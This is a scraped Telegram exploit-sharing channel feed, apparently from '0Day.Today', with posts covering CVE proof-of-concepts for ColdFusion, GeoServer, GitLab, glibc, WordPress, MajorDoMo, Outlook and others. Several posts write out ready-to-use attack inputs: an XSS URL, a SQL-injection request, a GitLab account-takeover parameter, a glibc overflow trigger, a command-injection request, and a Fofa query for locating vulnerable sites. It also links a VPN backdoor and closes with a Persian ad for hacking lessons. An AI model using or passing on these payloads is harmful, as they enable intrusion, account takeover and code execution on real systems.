CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4❤2
ColdFusion Debug XSS
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5❤2❤🔥1
CVE-2023-38831
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
😱14
CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - rvizx/CVE-2023-30547: PoC Exploit for VM2 Sandbox Escape Vulnerability
PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.
❤🔥3❤1
PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - dwisiswant0/cve-2023-50164-poc: Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164") - dwisiswant0/cve-2023-50164-poc
⚡3❤3❤🔥1
CVE-2023-50254 PoC Exploit for Deepin-reader RCE
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
🆒4👍1
CVE-2023-25157
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥5👍1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥2
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
🆒6❤3👎1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
❤🔥4❤2👎1
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤1⚡1
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC :
(exec -a "
printf '%0128000x' 1
" /usr/bin/su < /dev/null)#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍3🔥2
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤🔥3🔥3👍1
CVE-2024-21413: Microsoft Outlook Leak Hash
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
❤🔥2👍1
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``
#rce #Poc #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3❤🔥2
Linksys routers POCs
CVE-2024-33788
CVE-2024-33789
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-33788
CVE-2024-33789
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
❤2👎1
Media is too big
VIEW IN TELEGRAM
🔻آموزش هک سیستم عامل با استفاده از #اکسپلویت
✅این اکسپلویت مربوط به آسیب پذیری نرم افزار WinRAR هستش که بهتون یاد میدم که چطور میتونید #poc این آسیب پذیری رو انجام بدید.
📌برای شرکت توی دوره تست نفوذ شبکه ویژه بازار کار به پیوی تلگرام پیام بدید.
🆔@mk3em〽️
IR0Day.Today
@LearnExploit
@hakfateam
❤4